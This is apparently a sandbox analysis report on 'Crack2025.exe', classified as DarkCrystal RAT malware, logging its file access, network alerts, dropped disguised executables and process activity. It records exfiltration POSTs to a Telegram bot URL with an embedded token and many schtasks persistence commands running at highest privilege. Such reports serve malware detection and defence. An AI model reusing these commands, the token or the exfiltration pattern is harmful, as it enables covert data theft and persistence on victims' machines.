                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B5C220
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6B348 FindFirstFileExA,0_2_00B6B348
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49732 -> 172.67.159.138:80
                          Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.5:49740 -> 149.154.167.220:443
                          Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.5:49728 -> 149.154.167.220:443
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: global trafficHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="5eb2d835-abd6-4474-a3dd-17afeda6da5e"Host: api.telegram.orgContent-Length: 91505Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: global trafficHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="188a4226-8bbc-4d37-89a4-a0946ab71950"Host: api.telegram.orgContent-Length: 94182Expect: 100-continueConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                          Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: ipinfo.io
                          Source: unknownDNS query: name: ipinfo.io
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 34.117.59.81:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 34.117.59.81:443
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: 009383cm.nyashk.ru
                          Source: unknownHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="5eb2d835-abd6-4474-a3dd-17afeda6da5e"Host: api.telegram.orgContent-Length: 91505Expect: 100-continueConnection: Keep-Alive
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002ED3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002DF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482140681.0000000000CD2000.00000002.00000001.01000000.00000000.sdmp, KbrbnaEo.log.9.drString found in binary or memory: https://api.telegram.org/bot
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhotoX
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002ECE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482140681.0000000000CD2000.00000002.00000001.01000000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, KbrbnaEo.log.9.drString found in binary or memory: https://ipinfo.io/country
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482140681.0000000000CD2000.00000002.00000001.01000000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, KbrbnaEo.log.9.drString found in binary or memory: https://ipinfo.io/ip
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49724 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49740 version: TLS 1.2

                          System Summary

                          barindex
                          Windows Scripting host queries suspicious COM object (likely to drop second stage)
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B46FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00B46FAA
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Windows\ShellExperiences\309f4f93f5dc84Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMPJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMPJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4848E0_2_00B4848E
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B56CDC0_2_00B56CDC
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B500B70_2_00B500B7
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B540880_2_00B54088
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B440FE0_2_00B440FE
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B651C90_2_00B651C9
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B571530_2_00B57153
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B432F70_2_00B432F7
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B562CA0_2_00B562CA
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B543BF0_2_00B543BF
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4C4260_2_00B4C426
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4F4610_2_00B4F461
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6D4400_2_00B6D440
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B577EF0_2_00B577EF
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6D8EE0_2_00B6D8EE
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4286B0_2_00B4286B
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4E9B70_2_00B4E9B7
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B719F40_2_00B719F4
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B53E0B0_2_00B53E0B
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B64F9A0_2_00B64F9A
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4EFE20_2_00B4EFE2
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7A90D489_2_00007FF7C7A90D48
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7A90E439_2_00007FF7C7A90E43
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7E90AA69_2_00007FF7C7E90AA6
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeCode function: 14_2_00007FF7C7AA0D4814_2_00007FF7C7AA0D48
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeCode function: 14_2_00007FF7C7AA0E4314_2_00007FF7C7AA0E43
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AB0D4835_2_00007FF7C7AB0D48
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AE0BEA35_2_00007FF7C7AE0BEA
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AC106235_2_00007FF7C7AC1062
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 36_2_00007FF7C7AB0D4836_2_00007FF7C7AB0D48
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AD0BEA37_2_00007FF7C7AD0BEA
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AA0D4837_2_00007FF7C7AA0D48
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AA0E4337_2_00007FF7C7AA0E43
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AB106237_2_00007FF7C7AB1062
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AB106238_2_00007FF7C7AB1062
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AD0BEA38_2_00007FF7C7AD0BEA
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AA0D4838_2_00007FF7C7AA0D48
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AA0E4338_2_00007FF7C7AA0E43
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7A90D4839_2_00007FF7C7A90D48
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7A90E4339_2_00007FF7C7A90E43
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AC0BEA39_2_00007FF7C7AC0BEA
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AA106239_2_00007FF7C7AA1062
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 40_2_00007FF7C7A80D4840_2_00007FF7C7A80D48
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 40_2_00007FF7C7A80E4340_2_00007FF7C7A80E43
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AtYLDxzH.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: String function: 00B5F5F0 appears 31 times
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: String function: 00B5EC50 appears 56 times
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: String function: 00B5EB78 appears 39 times
                          Source: Crack2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: ComComponentRuntimeMonitor.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Registry.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: smartscreen.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: aePhPQ5epIOPbGayHv.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: ShellExperienceHost.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: xP1x1VNeIAPjWsHHYbBFNFY.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@40/33@4/2
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B46C74 GetLastError,FormatMessageW,0_2_00B46C74
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00B5A6C2
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\ZgWXldfI.logJump to behavior
                          Source: C:\Users\Public\Pictures\Registry.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8716:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-lyFL9C96UdpRArWkuUmQ
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\AppData\Local\Temp\zmghpwjxJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" "
                          Source: C:\Users\user\Desktop\Crack2025.exeCommand line argument: sfxname0_2_00B5DF1E
                          Source: C:\Users\user\Desktop\Crack2025.exeCommand line argument: sfxstime0_2_00B5DF1E
                          Source: C:\Users\user\Desktop\Crack2025.exeCommand line argument: STARTDLG0_2_00B5DF1E
                          Source: Crack2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\Crack2025.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Crack2025.exeVirustotal: Detection: 72%
                          Source: Crack2025.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\Crack2025.exeFile read: C:\Users\user\Desktop\Crack2025.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Crack2025.exe "C:\Users\user\Desktop\Crack2025.exe"
                          Source: C:\Users\user\Desktop\Crack2025.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Crtsvc\ComComponentRuntimeMonitor.exe "C:\Crtsvc/ComComponentRuntimeMonitor.exe"
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 9 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFY" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f
                          Source: unknownProcess created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 5 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP"
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 10 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aePhPQ5epIOPbGayHv" /sc ONLOGON /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 8 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 5 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComComponentRuntimeMonitor" /sc ONLOGON /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 6 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f
                          Source: unknownProcess created: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe C:\Crtsvc\aePhPQ5epIOPbGayHv.exe
                          Source: unknownProcess created: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe C:\Crtsvc\aePhPQ5epIOPbGayHv.exe
                          Source: unknownProcess created: C:\Crtsvc\ComComponentRuntimeMonitor.exe C:\Crtsvc\ComComponentRuntimeMonitor.exe
                          Source: unknownProcess created: C:\Crtsvc\ComComponentRuntimeMonitor.exe C:\Crtsvc\ComComponentRuntimeMonitor.exe
                          Source: unknownProcess created: C:\Users\Public\Pictures\Registry.exe C:\Users\Public\Pictures\Registry.exe
                          Source: unknownProcess created: C:\Users\Public\Pictures\Registry.exe C:\Users\Public\Pictures\Registry.exe
